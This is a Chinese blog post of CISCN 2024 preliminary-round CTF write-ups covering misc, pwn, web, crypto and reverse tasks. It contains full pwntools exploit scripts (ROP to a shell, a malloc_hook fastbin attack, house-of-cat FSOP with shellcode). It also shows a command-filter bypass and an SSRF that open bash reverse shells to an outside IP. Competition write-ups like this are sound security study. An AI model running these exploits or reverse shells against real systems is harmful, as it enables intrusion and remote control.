CISCN初赛wp misc,re,pwn,web,crypto

于 2024-05-20 22:22:59 发布
阅读量753 收藏 29
点赞数 18
分类专栏: wp 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fivesheeptree/article/details/139075620
版权

Misc

第一天_火锅链观光打卡

下载 MetaMask 扩展

答题得到七种食材

兑换 NFT

第一天_神秘文件

第一部分在文件的属性中,无法直接复制,手敲

Part1:flag{e

将ppt改为zip,翻一下document.xml会发现隐藏的字符

part2:675efb

凯撒加密

PART3:3-34

宏,按下「Alt+F11」组合键后,便可调出Microsoft Visual Basic 代码窗口,发现一段代码,RC4解密即可

Payt4:6f-40

图片上画笔画出的字符

pArt5:5f-90d

备注中的字符

ParT6:d-2

打开ppt的media中的图片找黄色的组成字符,base64解密

PART7=22b3

在slide4.xml中发现字符,底下有rot13加密的提示

paRt8:87e

slideLayout2.xml中发现字符,但是需要删掉部分字符------》remove

parT9:dee

在ppt/media中发现图片底下有字符串

PARt10:9}

在comment1.xml中找到最后的部分,提示维吉尼亚加密

flag{e675efb3-346f-405f-90dd-222b387edee9}

第一天_Power Trajectory Diagram

搜索如何查看npz文件,根据资料中的代码修改一下

import numpy as np


index = np.load("index.npy")
in_put = np.load("input.npy")
output = np.load("output.npy")
trace = np.load("trace.npy")

np.set_printoptions(threshold=np.inf)

print(index)
print(in_put)
print(output)
print(trace)


print(len("0000000000000000000000000000000000000000"))
str ="abcdefghijklmnopqrstuvwxyz0123456789_!@#"
print(len(str))

先打印一下index看看,发现是数字0-12,且每个数字有40个

 

查看input会得到一堆有规律的字符也就是abcdefghijklmnopqrstuvwxyz0123456789_!@#(也是40个) 

那么我们可以推断出根据index的数字对应input相同位置的字符

再观察trace中有很多小数,将其提取为表格来观察

import numpy as np


index = np.load("index.npy")
in_put = np.load("input.npy")
output = np.load("output.npy")
trace = np.load("trace.npy")

np.set_printoptions(threshold=np.inf)

print(index)
print(in_put)
print(output)
# print(trace)
# np.savetxt('trace.txt', output, fmt='%s')
np.savetxt('trace.csv', trace, delimiter=',', fmt='%s')

print(len("0000000000000000000000000000000000000000"))
str ="abcdefghijklmnopqrstuvwxyz0123456789_!@#"
print(len(str))

打开表格很明显的发现,有520行数据,520=13x40

也就是将数据分为13组40行的数据来看,发现很明显的地方

当前面1-40行都是-0.5而第36个数据是突变的,那么是不是意味着可以将36作为一个索引找到第一个字符"_",继续查看是否41-80行的数据也是和1-40行一样有突变的,验证我们的猜想

下一个数据是从第41行开始,同样也是第3个数据发生突变,也就是字符c

 

依次找到13个字符,索引得到flag

import numpy as np

data = [37, 3, 9, 19, 3, 14, 37, 29, 27, 29, 31, 37]

in__put = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',
           's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
           '_', '!', '@', '#']

index = np.load("index.npy")
# in_put = np.load("input.npy")
output = np.load("output.npy")
trace = np.load("trace.npy")

np.set_printoptions(threshold=np.inf)

# print(index)
# print(in_put)
# print(output)
# print(trace)
# np.savetxt('trace.txt', output, fmt='%s')
# np.savetxt('trace.csv', trace, delimiter=',', fmt='%s')

flag = ''.join([in__put[i-1] for i in data])

print("flag{"+flag+"}")

flag{_ciscn_2024_}

第二天_通风机

工具安装教程:https://blog.csdn.net/qq_42025309/article/details/114576190

搜索得知mwp文件可用 STEP7-Micro/WIN打开,首次打开报错,010查看发现少了文件头,新建一个文件,查看文件头为GJK,补充完整后打开,在符号表中找到base64加密后的flag

 

PWN

第一天_gostack

存在栈溢出,前提是不能破坏这个函数的参数,不然会报错

栈溢出时的寄存器情况:

正常输入的寄存器情况:

然后对照着将寄存器的值改回来,如果是地址的话直接去vmmap上找一个可写地址,最后ret2syscall

from pwn import *
from struct import *
from ctypes import *
from LibcSearcher import *
from functools import reduce
from z3 import *
import gmpy2
#import ctf_pb2

c = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
# srop :    frame = SigreturnFrame()
# fmt :        fmtstr_payload(offset=7,writes={0x4031E0:0x0401445,0x403410:0x401445},numbwritten=((14*2)+1),write_size='short')

s    =    lambda a              :pw.send(a)
sl   =    lambda a              :pw.sendline(a)
sa   =    lambda a,b            :pw.sendafter(a,b)
sla  =    lambda a,b            :pw.sendlineafter(a,b)
r    =    lambda a=6666         :pw.recv(a)
rl   =    lambda                :pw.recvline()
ru   =    lambda a,b=True       :pw.recvuntil(a,b)
g64  =    lambda                :u64(pw.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
g32  =    lambda                :u32(pw.recvuntil(b'\xf7').ljust(4,b'\x00'))
gl   =    lambda a              :u64(pw.recvuntil(a,drop=True).ljust(8,b'\x00'))
gc   =    lambda a              :u64(pw.recv(7).rjust(8,b'\x00'))
pwpw =    lambda                :pw.interactive()
lss  =    lambda s :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))
    
def sb(libc_base):
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

def orw(libc_base):
    return libc_base + libc.sym['open'], libc_base + libc.sym['read'], libc_base + libc.sym['write']

def search():
    libc = LibcSearcher("puts", puts)
    libc_base = puts - libc.dump("puts")
    system = libc.dump("system") + libc_base
    binsh = libc.dump("str_bin_sh") + libc_base
    return system,binsh

def dbg(a=''):
    if a !='':
        gdb.attach(pw,a) 
        pause()
    else:
        gdb.attach(pw)  
        pause()
    
# context(os = 'linux', arch = 'amd64', log_level = 'debug')
context.arch='amd64'
# context.arch = 'i386'
file = './gostack'
elf = ELF(file)
# libc = ELF('/home/pw/pwn_tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so')    
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
debug = 1
if debug == 0:
    pw = process(file)
if debug == 1:
    pw = remote('8.147.131.176',12220)

#----------------------------------------------------------------------
# dbg('b *0x4a0a14')
# dbg('b *0x04A0A88')
# dbg('b *0x491530')
# dbg('b *0x4a0a28')

rax = 0x040f984
# 0x000000000040f984 : pop rax ; ret
rdi = 0x04a18a5
# 0x00000000004a18a5 : pop rdi ; pop r14 ; pop r13 ; pop r12 ; pop rbp ; pop rbx ; ret
rsi = 0x042138a
# 0x000000000042138a : pop rsi ; ret
rdx = 0x04944ec
# 0x00000000004944ec : pop rdx ; ret
syscall = 0x0000000000404043


pay = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaac'
pay += p64(0x597000)
pay += p64(0x8)
# 0x597000
pay += b'paysaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaen'
pay += p64(0x549008)
pay += p64(rdi)+p64(0)*6+p64(rsi)+p64(0x597000)+p64(rdx)+p64(0x30)+p64(rax)+p64(0)+p64(syscall)
pay += p64(rdx)+p64(0)+p64(rsi)+p64(0)+p64(rax)+p64(0x3b)+p64(rdi)+p64(0x597000)*6+p64(syscall)
sl(pay)

sleep(1)
sl(b'/bin/sh\x00')
# pay = b'a'*8
# pay = b'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraae'
# sl(pay)
# dbg()
pwpw()

第一天_orange_cat_diary 

溢出8字节改top_chunk_size,然后申请一个大chunk就可以将top_chunk放到unsorted_bin中,得到libc基地址

存在uaf,直接fastbin_attack打malloc_hook秒了

from pwn import *
from struct import *
from ctypes import *
from LibcSearcher import *
from functools import reduce
from z3 import *
import gmpy2
#import ctf_pb2

c = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
# srop :    frame = SigreturnFrame()
# fmt :        fmtstr_payload(offset=7,writes={0x4031E0:0x0401445,0x403410:0x401445},numbwritten=((14*2)+1),write_size='short')

s    =    lambda a              :pw.send(a)
sl   =    lambda a              :pw.sendline(a)
sa   =    lambda a,b            :pw.sendafter(a,b)
sla  =    lambda a,b            :pw.sendlineafter(a,b)
r    =    lambda a=6666         :pw.recv(a)
rl   =    lambda                :pw.recvline()
ru   =    lambda a,b=True       :pw.recvuntil(a,b)
g64  =    lambda                :u64(pw.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
g32  =    lambda                :u32(pw.recvuntil(b'\xf7').ljust(4,b'\x00'))
gl   =    lambda a              :u64(pw.recvuntil(a,drop=True).ljust(8,b'\x00'))
gc   =    lambda a              :u64(pw.recv(7).rjust(8,b'\x00'))
pwpw =    lambda                :pw.interactive()
lss  =    lambda s :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))
    
def sb(libc_base):
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

def orw(libc_base):
    return libc_base + libc.sym['open'], libc_base + libc.sym['read'], libc_base + libc.sym['write']

def search():
    libc = LibcSearcher("puts", puts)
    libc_base = puts - libc.dump("puts")
    system = libc.dump("system") + libc_base
    binsh = libc.dump("str_bin_sh") + libc_base
    return system,binsh

def dbg(a=''):
    if a !='':
        gdb.attach(pw,a) 
        pause()
    else:
        gdb.attach(pw)  
        pause()
    
# context(os = 'linux', arch = 'amd64', log_level = 'debug')
context.arch='amd64'
# context.arch = 'i386'
file = './1'
elf = ELF(file)
libc = ELF('/home/pw/pwn_tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')    
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
debug = 0
if debug == 0:
    pw = process(file)
if debug == 1:
    pw = remote('8.147.133.63',43396)

#----------------------------------------------------------------------
# dbg()
sl(b'dijia')
def add(size,text):
    sla(b'choice:',str(1))
    sla(b'content:',str(size))
    sa(b'content:',text)
def show():
    sla(b'choice:',str(2))
def free():
    sla(b'choice:',str(3))
def edit(size,text):
    sla(b'choice:',str(4))
    sla(b'content:',str(size))
    sa(b'content:',text)

add(0x18,b'a')
edit(0x18+7,b'a'*0x18+p16(0xfe1)+b'\x00')
add(0xff8,b'a')
add(0x30,b'a')
add(0xff8,b'a')
add(0x68,b'a')
show()
pw.recv(8)
libc_base = u64(pw.recv(6).ljust(8,b'\x00'))-1640-0x10-libc.sym['__malloc_hook']
lss('libc_base')
pw.recv(2)
heap_base = u64(pw.recv(6).ljust(8,b'\x00'))-0x60
lss('heap_base')

free()
edit(0x8,p64(libc_base+libc.sym['__malloc_hook']-0x23))
add(0x60,b'a')

ogg = [0x4527a,0xf03a4,0xf1247]
add(0x60,b'a'*0x13+p64(libc_base+ogg[1]))

sla(b'choice:',str(1))
sla(b'content:',str(0x30))

# dbg()
pwpw()

第二天_EzHeap

存在堆溢出,直接house of cat秒了

from pwn import *
from struct import *
from ctypes import *
from LibcSearcher import *
from functools import reduce
from z3 import *
import gmpy2
#import ctf_pb2

c = cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc.so.6')
# srop :    frame = SigreturnFrame()
# fmt :        fmtstr_payload(offset=7,writes={0x4031E0:0x0401445,0x403410:0x401445},numbwritten=((14*2)+1),write_size='short')

s    =    lambda a              :pw.send(a)
sl   =    lambda a              :pw.sendline(a)
sa   =    lambda a,b            :pw.sendafter(a,b)
sla  =    lambda a,b            :pw.sendlineafter(a,b)
r    =    lambda a=6666         :pw.recv(a)
rl   =    lambda                :pw.recvline()
ru   =    lambda a,b=True       :pw.recvuntil(a,b)
g64  =    lambda                :u64(pw.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
g32  =    lambda                :u32(pw.recvuntil(b'\xf7').ljust(4,b'\x00'))
gl   =    lambda a              :u64(pw.recvuntil(a,drop=True).ljust(8,b'\x00'))
gc   =    lambda a              :u64(pw.recv(7).rjust(8,b'\x00'))
pwpw =    lambda                :pw.interactive()
lss  =    lambda s :log.success('\033[1;31;40m%s --> 0x%x \033[0m' % (s, eval(s)))
    
def sb(libc_base):
    return libc_base + libc.sym['system'], libc_base + next(libc.search(b'/bin/sh\x00'))

def orw(libc_base):
    return libc_base + libc.sym['open'], libc_base + libc.sym['read'], libc_base + libc.sym['write']

def search():
    libc = LibcSearcher("puts", puts)
    libc_base = puts - libc.dump("puts")
    system = libc.dump("system") + libc_base
    binsh = libc.dump("str_bin_sh") + libc_base
    return system,binsh

def dbg(a=''):
    if a !='':
        gdb.attach(pw,a) 
        pause()
    else:
        gdb.attach(pw)  
        pause()
    
# context(os = 'linux', arch = 'amd64', log_level = 'debug')
context.arch='amd64'
# context.arch = 'i386'
file = './EzHeap'
elf = ELF(file)
# libc = ELF('/home/pw/pwn_tools/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so')    
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
debug = 1
if debug == 0:
    pw = process(file)
if debug == 1:
    pw = remote('8.147.134.47',40528)

#----------------------------------------------------------------------
def add(size,text=b'a'):
    sla(b'choice >>',str(1))
    sla(b'size:',str(size))
    sa(b'content:',text)
def free(idx):
    sla(b'choice >>',str(2))
    sla(b'idx:',str(idx))
def edit(idx,size,text):
    sla(b'choice >>',str(3))
    sla(b'idx:',str(idx))
    sla(b'size:',str(size))
    sa(b'content:',text)
def show(idx):
    sla(b'choice >>',str(4))
    sla(b'idx:',str(idx))

add(0x200,b'a'*8) #0
add(0x410,b'a'*8) #1
add(0x200,b'a'*8) #2
add(0x200,b'a'*8) #3
free(1)
edit(0,0x210,b'a'*(0x210-4)+b'stop')
show(0)
ru(b'stop')
libc_base = u64(pw.recv(6).ljust(8,b'\x00'))-0x21ace0
lss('libc_base')
edit(0,0x210,b'a'*0x200+p64(0)+p64(0x420))
add(0x200,b'a') #1
free(1)
free(2)
edit(0,0x210,b'a'*(0x210-4)+b'stop')
show(0)
ru(b'stop')
key = u64(pw.recv(5).ljust(8,b'\x00'))
lss('key')
heap_base = key << 12
lss('heap_base')
edit(0,0x220,b'a'*0x200+p64(0)+p64(0x210))

add(0x300)  #1
add(0x428)  #2
add(0x240)  #4
add(0x418)  #5
add(0x410)  #6
free(2)
add(0x438)
free(5)
edit(1,0x400,b'a'*0x300+p64(0)+p64(0x431)+p64(libc_base+0x21b0d0)*2+p64(heap_base+0x1060)+p64(libc_base+libc.sym['_IO_list_all']-0x20))
add(0x438)

mprotect       = libc_base + libc.sym['mprotect']
setcontext      = libc_base + libc.sym['setcontext']
_IO_list_all    = libc_base + libc.sym['_IO_list_all']
_IO_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']

# rax = libc_base + 0x04a550
# rdi = libc_base + 0x026b72
# rsi = libc_base + 0x027529
# rdx = libc_base + 0x01626d6
# pop_5 = libc_base + 0x0013931d
rax = libc_base + 0x045eb0
rdi = libc_base + 0x02a3e5
rsi = libc_base + 0x02be51
rdx = libc_base + 0x011f2e7
pop_5 = libc_base + 0x040487
RCE = setcontext + 61

fake_IO_addr = heap_base + 0x16e0
fake_IO_FILE  = p64(8)
fake_IO_FILE += p64(RCE) # call # setcontext + 61 # libc2.35
fake_IO_FILE += p64(0) +p64(1) # _IO_write_base # _IO_write_ptr
fake_IO_FILE += p64(fake_IO_addr) # fp->_IO_write_ptr
fake_IO_FILE += p64(rdi) + p64(heap_base) + p64(rsi) + p64(0x21000) + p64(rdx) + p64(7) # pop*5 to me
fake_IO_FILE += p64(fake_IO_addr+0xc0)
fake_IO_FILE += p64(mprotect)
fake_IO_FILE += p64(fake_IO_addr + 248) # shellcode_addr
fake_IO_FILE  = fake_IO_FILE.ljust(0x90,b'\x00')
fake_IO_FILE += p64(fake_IO_addr+0x10)
fake_IO_FILE += p64(pop_5) # setcontext Tow CALL #need pop * 5 ;ret
fake_IO_FILE  = fake_IO_FILE.ljust(0xb0,b'\x00')
fake_IO_FILE += p64(1) # mode
fake_IO_FILE  = fake_IO_FILE.ljust(0xc8,b'\x00')
fake_IO_FILE += p64(_IO_wfile_jumps + 0x30)
fake_IO_FILE  = fake_IO_FILE.ljust(0xe0,b'\x00')
fake_IO_FILE += p64(fake_IO_addr)
fake_IO_FILE += asm(shellcraft.open('./flag'))
fake_IO_FILE += asm(shellcraft.read(3,heap_base+0x300,0x40))
fake_IO_FILE += asm(shellcraft.write(1,heap_base+0x300,0x40))
print('len :'+hex(len(fake_IO_FILE)))
edit(4,0x500,b'a'*0x240+p64(0)+p64(0x421)+fake_IO_FILE)

sl(str(5))
# dbg()
pwpw()

 

WEB

第一天_Simple_php

<?php
ini_set('open_basedir', '/var/www/html/');
error_reporting(0);

if(isset($_POST['cmd'])){
    $cmd = escapeshellcmd($_POST['cmd']); 
     if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {
         system($cmd);
}
}


show_source(__FILE__);
?>

发现可以用 %0a绕过;在vps上写一个反弹shell的文件

/bin/bash -c 'bash -i >& /dev/tcp/81.71.13.76/5555 0>&1'

 python3 -m http.server

curl http://1363610956:8000/a -o /tmp/a

反弹shell

cmd=/bin/bas%0ah+/tmp/a

 维持shell

script /dev/null -c /bin/bash

stty raw -echo; fg

然后在数据库中找到flag;

mysql -uroot -proot

第二天_easycms

存在ssrf,并且存在后门文件 flag.php

尝试用第一天的payload打一下,发现报错"不是一张正常的图片",将重定向的php文件添加文件头

GIF89a

GIF89a
GIF89a
GIF89a
GIF89a
<?php
$redirect_url = "http://127.0.0.1/flag.php?cmd=%2Fbin%2Fbash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F81.71.13.76%2F5656%200%3E%261'";
header('Location: ' . $redirect_url, true, 302);
exit();
?>

 然后执行命令,成功反弹shell

/?s=api&c=api&m=qrcode&text=9999999999999999999999&thumb=http://ip:port/a.php&size=9999999999999999999999&level=1

Crypto

古典密码

先Atbash Cipher再base64

fa{2b838a-97ad-e9f743lgbb07-ce47-6e02804c}

再栅栏解密

 

OvO

XYCTF 铜匠 ,类似,据此搜索

d高位攻击

根据题目加密要求稍改脚本

Sage 里环中数大致相等可算

 

    rr = kk + 2
    e = 65537 + kk * p + rr * ((p+1) * (q+1)) + 1

 

kk = e//n - 2

把 kk 代入 e中的式子,再两边乘p,就剩一个未知数了,多项式可求

e*p = ( 65537*p + kk * p*p + rr * (n*p+p*p+n+1) + p)

np+pp+n+1

f=e* p - ( 65537*p + kk * p*p + rr * (n*p+p*p+n+1) + p)

exp:

import libnum

def get_full_p(p_high, n,d_high,bits):
    PR.<x> = PolynomialRing(Zmod(n))
    f = x + p_high
    f = f.monic()
    roots = f.small_roots(X=2^(bits + 4), beta=0.4)
    if roots:
        x0 = roots[0]
        p = gcd(x0 + p_high, n)
        return ZZ(p)

def find_p_high(d_high, n,bits):
    kk = d_high//n - 2
    rr = kk+2
    PR.<p> = PolynomialRing(RealField(1000))
    f=d_high * p - ( 65537*p + kk * p*p + rr * (n*p+p*p+n+1)+ p)
    results = f.roots()
    if results:
        for x in results:
            p_high = int(x[0])
            p = get_full_p(p_high, n,d_high,bits)
            if p and p != 1:
                return p

n = 111922722351752356094117957341697336848130397712588425954225300832977768690114834703654895285440684751636198779555891692340301590396539921700125219784729325979197290342352480495970455903120265334661588516182848933843212275742914269686197484648288073599387074325226321407600351615258973610780463417788580083967
e = 37059679294843322451875129178470872595128216054082068877693632035071251762179299783152435312052608685562859680569924924133175684413544051218945466380415013172416093939670064185752780945383069447693745538721548393982857225386614608359109463927663728739248286686902750649766277564516226052064304547032760477638585302695605907950461140971727150383104
c = 14999622534973796113769052025256345914577762432817016713135991450161695032250733213228587506601968633155119211807176051329626895125610484405486794783282214597165875393081405999090879096563311452831794796859427268724737377560053552626220191435015101496941337770496898383092414492348672126813183368337602023823

p = find_p_high(e, n,200)
q = n//p

rr = e//((p+1)*(q+1))
kk = rr-2
e = 65537 + kk * p + rr * ((p+1) * (q+1)) + 1
d = libnum.invmod(e,(p-1)*(q-1))
m = pow(c,d,n)
print(libnum.n2s(int(m)))


# flag{b5f771c6-18df-49a9-9d6d-ee7804f5416c}

 

Re

第一天_asm_re

gpt找到大概的加密逻辑

数据存储方式----->       <<2    也就是0xd7, 0x1f-----》0x1fd7,需要转换一下数据

data = [0xd7, 0x1f, 0xb7, 0x21, 0x47, 0x1e, 0x27, 0x20, 0xe7, 0x26, 0xd7, 0x10, 0x27, 0x11, 0x07, 0x20, 0xc7, 0x11, 0x47, 0x1e, 0x17, 0x10, 0x17, 0x10, 0xf7, 0x11, 0x07, 0x20, 0x37, 0x10, 0x07, 0x11, 0x17, 0x1f, 0xd7, 0x10, 0x17, 0x10, 0x17, 0x10, 0x67, 0x1f, 0x17, 0x10, 0xc7, 0x11, 0xc7, 0x11, 0x17, 0x10, 0xd7, 0x1f, 0x17, 0x1f, 0x07, 0x11, 0x47, 0x0f, 0x27, 0x11, 0x37, 0x10, 0x47, 0x1e, 0x37, 0x10, 0xd7, 0x1f, 0x07, 0x11, 0xd7, 0x1f, 0x07, 0x11, 0x87, 0x27]
flag = ""
for i in range(0, len(data), 2):
    x = data[i:i+2]
    y = int(x[1] << 8 | x[0])
    result = (((y - 0x1E) ^ 0x4D) - 0x14) // 0x50
    flag += chr(result)
print(flag)

第一天_androidso_re

jeb找到加密函数,DES加密

但是还缺少key,iv

将后缀改为zip,找so文件,静态分析

gege函数里面是凯撒加密,密钥是10

V2YzREx1cHM=

iv=Wf3DLups

key是jiejie函数RC4加密,再加上异或

根据YourRC4Key也能猜到哈哈哈哈哈哈哈

data = [0x42,0xb1,0x66,0xdc,0x03,0x6d,0x45,0x1b,0xc2,0x3b,0x58,0xba]
print(chr(data[0]^0x3),end="")
print(chr(data[1]^0x89),end="")
print(chr(data[2]^0x33),end="")
print(chr(data[3]^0xB8),end="")
print(chr(data[4]^0x54),end="")
print(chr(data[5]^0xC),end="")
print(chr(data[6]^0x20),end="")
print(chr(data[7]^0x6A),end="")

key=A8UdWaeq

在线DES解密得到flag

第二天_whereThel1b

这是一道python逆向

导入so库之后先运行一下脚本看看

4/6的比例 猜测是base64 但是结果不是标准的base64 说明中间可能还有别的操作 或者是换表

多次输入很多个1 得到的结果可以看出也不是换表 说明base64之后可能是进行了异或操作

先输入4个1 进行base64加密 同时运行代码得到结果

将这两个值进行异或

将1111改成2222 进行同样的操作

得到的结果是一样的 说明异或的密钥是一样的

根据base64长度的特征输入长度为42的值 进行上面的操作 得到key

将key与密文进行异或

list2 = [108, 117, 72, 80, 64, 49, 99, 19, 69, 115, 94, 93, 94, 115, 71, 95, 84, 89, 56, 101, 70, 2, 84, 75, 127, 68, 103, 85, 105, 113, 80, 103, 95, 67, 81, 7, 113, 70, 47, 73, 92, 124, 93, 120, 104, 108, 106, 17, 80, 102, 101, 75, 93, 68, 121, 26]
key = [0x36, 0x18, 0x30, 0x38, 0x1a, 0x02, 0x10, 0x20, 0x1f, 0x19, 0x32, 0x35, 0x13, 0x1e, 0x16, 0x25, 0x0d, 0x20, 0x08, 0x12, 0x08, 0x30, 0x06, 0x27, 0x33, 0x10, 0x22, 0x2d, 0x33, 0x26, 0x09, 0x13, 0x06, 0x2e, 0x04, 0x36, 0x2b, 0x15, 0x1e, 0x23, 0x06, 0x16, 0x1b, 0x14, 0x27, 0x28, 0x0d, 0x23, 0x1e, 0x1c, 0x37, 0x21, 0x10, 0x03, 0x33, 0x23]

for i in range(len(list2)):
    print(hex(key[i] ^ list2[i]), end=' ')
fivesheeptree
关注
  • 18
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2160
2022 CISCN 初赛pwn的完整wp
CTF比赛的常用工具,包括Web、RE、MiscCryptoPWN、IOT等方向
09-30
CTF比赛的常用工具,包括Web、RE、MiscCryptoPWN、IOT等方向,非常适合安全初学者。
CISCN国赛--wp
qing_chuan_的博客
05-31 561
第一次参加国赛,我一个小菜鸡,真的纯纯是坐牢。
2020ciscn wp
qq_52342676的博客
05-30 753
第十五届全国大学生信息安全竞赛创新实践能力赛
2022CISCN初赛 WP
Lum1n0us's Blog
05-29 1194
文章目录Crypto签到电台 Crypto 签到电台 在公众号找到提示 在“标准电码表”找“弼时安全到达了”所对应的7个电码,再跟“密码本”的前7*4个数字分别逐位进行“模十算法”(加不进位、减不借位),所得到的就是要发送的电码。 发送电码前先发送“s”启动,即按3个“.”,这个发送电报的过程可以使用抓包软件进行抓取,可方便输入电报。 “弼时安全到达了”所对应的7个电码: 1732 2514 1344 0356 0451 6671 0055 模十算法示例:1732与6378得到7000 发包示例:/sen
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2127
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTF的wp写一下,供大家参考。赛题不分上下午场了。
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
ctf-tools:CTF工具集合
02-04
ctf-tools:CTF工具集合
ctf-wiki:CTF Wiki的新起点! 快来加入我们,我们需要您!
02-04
CTF维基 欢迎使用CTF Wiki ! CTF (Capture The Flag)是从DEFCON CTF开始的, DEFCON CTF是计算机安全爱好者之间的竞争性游戏,最初于1996年举办。 CTF涵盖了广泛的领域。 随着安全技术的不断发展, CTF挑战的难度...
2014ISCC题目(Re、PwnMisc).zip
09-30
2014ISCC题目(Re、PwnMisc).zip
CISCN2018-WP
04-30 648
MISC: 验证码: 用token登录 输入好验证码就可以得到flag Picture: 图片隐写,一下就想到binwalk或者winhex打开试试 binwalk打开无果 将这段数据ctrl+shift+c复制出来 用下面python脚本生成zip文件。 import zlib import binascii import base64 id=”...
2022 CISCN全国初赛-wp
qq_45603443的博客
05-30 1770
2022 CISCN全国初赛-wpWebEzpoponline_crtMiscez_usbCrypto签到基于挑战码的双向认证基于挑战码的双向认证2基于挑战码的双向认证3Pwnpwn1重点来了 Web Ezpop <?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $wi
第14届(2021)CISCN初赛WP(1)——easy_source
InterplanetaryW的博客
06-15 316
easy_source WriteUp 题目打开没发现啥,就先看看index.php,还是没有什么变化。这时候想起来前段时间遇到过考敏感文件的。有三种都来试试: robots.txt gedit备份文件,格式为filename~,比如index.php~ vim备份文件,格式为.filename.swp 或者 *.swo 然后发现备份文件/.index.php.swo可行 发现了GET传参的要求,构造payload: ?rc=ReflectionMethod&ra=User&rb=q
2022 CISCN 创新能力实践赛初赛WP
Love&Share
05-31 1929
WP来自齐鲁师范学院网络安全社团 文章目录MISCez_usbeverlasting_nightbabydiskWEBEzpoponline_crtPWNlogin-nomalCRY基于挑战码的双向认证1基于挑战码的双向认证2基于挑战码的双向认证2签到电台ISO9798 MISC ez_usb 文件-导出特定分组 tshark -r 2.8.1.pcapng -T fields -e usb.capdat > 2.8.1.txt ​ import os,sys ​ normalKeys = {.
buuctf ciscn_2019_s_4 pwn wp
weixin_44740530的博客
04-21 338
buuctf ciscn_2019_s_4 pwn wp https://www.jianshu.com/p/fabc34bafe18
第15届全国大学生知识竞赛 2022ciscn初赛 部分wp
blowed的博客
05-31 1495
Misc ez_usb 1.键盘流量 USB协议数据部分在Leftover Capture Data域中,数据长度为八个字节。其中键盘击键信息集中在第三个字节中。 如图,发现击键信息为0x06,即对应的按键为C 2.鼠标流量 USB协议鼠标数据部分在Leftover Capture Data域中,数据长度为四个字节。 其中第一个字节代表按键,当取0x00时,代表没有按键、为0x01时,代表按左键,为0x02时,代表当前按键为右键。 第二个字节可以看成是一个signed byte类型,
CISCN 2020 线上初赛 z3 WP
h1nt的博客
08-21 1180
IDA打开后核心代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+20h] [rbp-60h] int v5; // [rsp+24h] [rbp-5Ch] int v6; // [rsp+28h] [rbp-58h] int v7; // [rsp+2Ch] [rbp-54h] int v8; // [rsp+30h] [rbp-50h] int v9;
第14届(2021)CISCN初赛WP(2)——Glass
InterplanetaryW的博客
06-15 367
Glass Writeup 首先使用apktool将“glass.apk”文件反编译 结果如下,提取其中Classes.dex文件 利用dex2jar工具进行反编译得到jar文件 生成jar包 使用jd-gui打开jar包,看到源码 核心判断函数如图所示 可以发现判断是利用checkFlag()函数 checkFlag为native外部函数 使用ida打开提取出的libnative-lib.so动态链接库 分析结束后可以在函数列表中很容易找到checkFlag()函数 使用F5进行反编译
ciscn_2019_c_11的wp
wuyvle的博客
